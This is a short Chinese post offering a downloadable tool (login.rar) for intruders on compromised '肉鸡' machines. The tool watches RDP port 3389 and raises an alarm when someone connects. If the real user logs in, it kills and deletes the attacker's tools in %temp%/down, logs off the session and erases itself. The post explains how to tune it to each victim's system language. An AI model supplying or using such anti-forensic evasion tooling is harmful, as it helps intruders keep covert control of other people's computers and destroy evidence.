作者:Netpatch
来源:WEB安全手册
主要用于在登陆肉鸡终端的时候,放哨用的。一旦有人连接终端端口(默认端口3389),就发声报警,并对对方是否登陆进行监控。
如果有人登陆终端成功,就自动把指定目录的工具(exe后缀的)循环进行“结束 程序进程”操作,整目录进行删除,然后注销会话并删除自身(不留任何文件)。
需要根据环境修改的参数如下:
1.终端端口(本程序为3389)
2.FC的判断结果,需要根据肉鸡语言决定(本程序针对EN 2K3版本) 判断字符串为 FC对比无异同的结果取单词 differences
+++++++++++++++++++++++++++++++++++++++++++++++++++
c:/>echo a>1
c:/>echo a>2
c:/>fc /b 1 2
Comparing files 1 and 2
FC: no differences encountered
+++++++++++++++++++++++++++++++++++++++++++++++++++++
%temp%/down 此目录是用来放要运行的工具的,EXE后缀的程序,当终端有别人登录时会被程序自动结束进程(所有EXE后缀的文件循环一遍)
下载地址:login.rar
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论